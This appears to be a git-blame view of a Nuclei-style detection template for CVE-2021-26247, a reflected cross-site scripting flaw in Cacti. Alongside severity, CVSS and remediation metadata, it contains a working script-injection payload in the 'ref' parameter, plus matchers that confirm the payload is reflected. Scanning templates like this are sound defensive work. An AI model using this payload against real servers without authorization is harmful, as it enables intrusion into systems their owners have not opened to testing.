2022-02-01 06:04:51 +00:00
id : CVE-2021-26247
info :
2022-08-29 13:55:23 +00:00
name : Cacti - Cross-Site Scripting
2022-02-01 06:04:51 +00:00
author : dhiyaneshDK
severity : medium
2022-08-29 13:55:23 +00:00
description : Cacti contains a cross-site scripting vulnerability via "http://<CACTI_SERVER>/auth_changepassword.php?ref=<script>alert(1)</script>" which can successfully execute the JavaScript payload present in the "ref" URL parameter.
2023-09-06 12:09:01 +00:00
remediation : |
Apply the latest security patches or upgrade to a patched version of Cacti to mitigate this vulnerability.
2022-04-22 10:38:41 +00:00
reference :
2022-05-17 09:18:12 +00:00
- https://www.cacti.net/info/changelog
2022-08-29 13:55:23 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2021-26247
2022-02-01 06:06:15 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 6.1
2022-02-01 06:06:15 +00:00
cve-id : CVE-2021-26247
cwe-id : CWE-79
2023-10-14 11:27:55 +00:00
epss-score : 0.00255
2023-10-19 10:38:59 +00:00
epss-percentile : 0.63056
2023-09-06 12:09:01 +00:00
cpe : cpe:2.3:a:cacti:cacti:0.8.7g:*:*:*:*:*:*:*
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : cacti
product : cacti
tags : cve,cve2021,cacti,xss
2022-02-01 06:04:51 +00:00
2023-04-27 04:28:59 +00:00
http :
2022-02-01 06:04:51 +00:00
- method : GET
path :
2022-02-01 19:18:29 +00:00
- '{{BaseURL}}/auth_changepassword.php?ref=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E'
2022-02-01 06:04:51 +00:00
matchers-condition : and
matchers :
- type : word
part : body
words :
2022-02-01 19:18:29 +00:00
- '"></script><script>alert(document.domain)</script>'
2022-02-01 06:04:51 +00:00
- type : word
part : header
words :
- "text/html"
- type : status
status :
- 200